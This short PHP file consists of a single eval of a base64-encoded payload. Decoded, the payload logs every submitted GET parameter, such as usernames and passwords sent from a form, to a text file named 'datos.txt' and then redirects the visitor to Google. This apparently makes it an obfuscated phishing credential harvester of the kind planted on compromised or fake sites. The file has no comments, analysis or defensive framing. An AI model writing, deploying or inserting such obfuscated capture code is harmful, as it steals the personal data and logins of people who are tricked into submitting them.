<?php
eval("eval(base64_decode('CmhlYWRlcigiTG9jYXRpb246IGh0dHBzOi8vd3d3Lmdvb2dsZS5jb20gIik7CiRoYW5kbGUgPQoKZm9wZW4oImRhdG9zLnR4dCIsImEiKTsKZm9yZWFjaCgkX0dFVCBhcwoKJHZhcmlhYmxlID0+ICR2YWx1ZSkgewpmd3JpdGUoJGhhbmRsZSwKCiR2YXJpYWJsZSk7CmZ3cml0ZSgkaGFuZGxlLCAiID0gIik7Cgpmd3JpdGUoJGhhbmRsZSwkdmFsdWUpOwpmd3JpdGUoJGhhbmRsZSwKCiJcclxuIik7Cn0KZndyaXRlKCRoYW5kbGUsIlxyXG4iKTsKZmNsb3NlKCRoYW5kbGUpOwpleGl0Owo='));");
?>
